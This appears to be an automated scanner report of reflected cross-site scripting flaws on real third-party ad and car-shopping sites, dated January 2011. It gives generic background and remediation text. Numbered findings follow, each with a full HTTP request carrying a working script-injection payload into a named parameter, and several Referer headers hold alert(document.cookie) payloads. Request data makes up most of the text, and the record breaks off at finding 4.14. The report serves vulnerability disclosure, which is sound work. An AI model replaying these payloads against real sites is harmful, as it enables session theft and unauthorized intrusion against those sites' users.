http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [PV_CT cookie]
http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [BDATALIST cookie]
http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [PV_CT cookie]
http://www.autobytel.com/coupons/my-garage.htm [BDATALIST cookie]
http://www.autobytel.com/coupons/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/diagnose-problem/my-garage.htm [BDATALIST cookie]
http://www.autobytel.com/diagnose-problem/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/my-garage.htm [BDATALIST cookie]
http://www.autobytel.com/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/new-car-price-quotes.htm [BDATALIST cookie]
http://www.autobytel.com/new-car-price-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/new-cars.htm [BDATALIST cookie]
http://www.autobytel.com/new-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/repair-cost-calculator/my-garage.htm [BDATALIST cookie]
http://www.autobytel.com/repair-cost-calculator/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/sitemap/index.cfm [BDATALIST cookie]
http://www.autobytel.com/sitemap/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/sitemap/index.cfm [PV_CT cookie]
http://www.autobytel.com/used-cars.htm [BDATALIST cookie]
http://www.autobytel.com/used-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]
http://www.autobytel.com/x22 [BDATALIST cookie]
http://www.autotrader.com/ [JSESSIONID cookie]
http://www.newsvine.com/_wine/save [u parameter]
http://www.newsvine.com/_wine/save [u parameter]
http://www.payloadmagazine.com/ [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/adops/google/rev2/afc/css/

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 5f85f<script>alert(1)</script>5f7015187b was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adops/google/rev2/afc/css/?fn=afc_sf_lbd_x3.css&id=fad815f85f<script>alert(1)</script>5f7015187b&class= HTTP/1.1
Host: a.fsdn.com
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/softwaremap/?a3f06%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8a4aedca02f=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/css; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Tue, 08 Feb 2011 04:24:44 GMT
Date: Tue, 25 Jan 2011 04:24:44 GMT
Connection: close
Content-Length: 1410

#fad815f85f<script>alert(1)</script>5f7015187b {
   width:728px;
   height:90px;
}

#fad815f85f<script>alert(1)</script>5f7015187b div.google_afc {
   width:728px;
   height:90px;
}

#fad815f85f<script>alert(
...[SNIP]...

4.2. http://ads.tweetmeme.com/serve.js [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The value of the height request parameter is copied into an HTML comment. The payload a75da--><script>alert(1)</script>e874b2130e was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728&height=90a75da--><script>alert(1)</script>e874b2130e&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:26:48 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h00
Content-Length: 8965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
<script>alert(1)</script>e874b2130e -->
...[SNIP]...

4.3. http://ads.tweetmeme.com/serve.js [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The value of the width request parameter is copied into an HTML comment. The payload ab33b--><script>alert(1)</script>47c6f06bcd0 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728ab33b--><script>alert(1)</script>47c6f06bcd0&height=90&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:26:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h02
Content-Length: 8966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
<script>alert(1)</script>47c6f06bcd0x90 -->
...[SNIP]...

4.4. http://adserver.teracent.net/tase/ad [AMod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the AMod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 704ac"-alert(1)-"36514afc716 was submitted in the AMod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=704ac"-alert(1)-"36514afc716&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.5. http://adserver.teracent.net/tase/ad [AMod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the AMod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a60bb"><script>alert(1)</script>4b5843a51b0 was submitted in the AMod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=a60bb"><script>alert(1)</script>4b5843a51b0&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.6. http://adserver.teracent.net/tase/ad [ASeg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the ASeg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc683"-alert(1)-"2dc1b33b334 was submitted in the ASeg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=fc683"-alert(1)-"2dc1b33b334&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.7. http://adserver.teracent.net/tase/ad [ASeg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the ASeg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90217"><script>alert(1)</script>6ce426e55d3 was submitted in the ASeg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=90217"><script>alert(1)</script>6ce426e55d3&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.8. http://adserver.teracent.net/tase/ad [AdID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b4b"><script>alert(1)</script>7111b958da3 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284f9b4b"><script>alert(1)</script>7111b958da3&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.9. http://adserver.teracent.net/tase/ad [AdID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68150"-alert(1)-"af2d3269c19 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=211728468150"-alert(1)-"af2d3269c19&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.10. http://adserver.teracent.net/tase/ad [FlightID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9a8e"><script>alert(1)</script>c449e67c456 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600e9a8e"><script>alert(1)</script>c449e67c456&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.11. http://adserver.teracent.net/tase/ad [FlightID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c10d"-alert(1)-"062e6ccec6 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=8506005c10d"-alert(1)-"062e6ccec6&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.12. http://adserver.teracent.net/tase/ad [RawValues parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the RawValues request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d9ad"-alert(1)-"f428853feb was submitted in the RawValues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C12959219866d9ad"-alert(1)-"f428853feb&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.13. http://adserver.teracent.net/tase/ad [RawValues parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The value of the RawValues request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7d7"><script>alert(1)</script>68b15c3d96b was submitted in the RawValues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986ca7d7"><script>alert(1)</script>68b15c3d96b&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

4.14. http://adserver.teracent.net/tase/ad [Redirect parameter] previous next

Summary

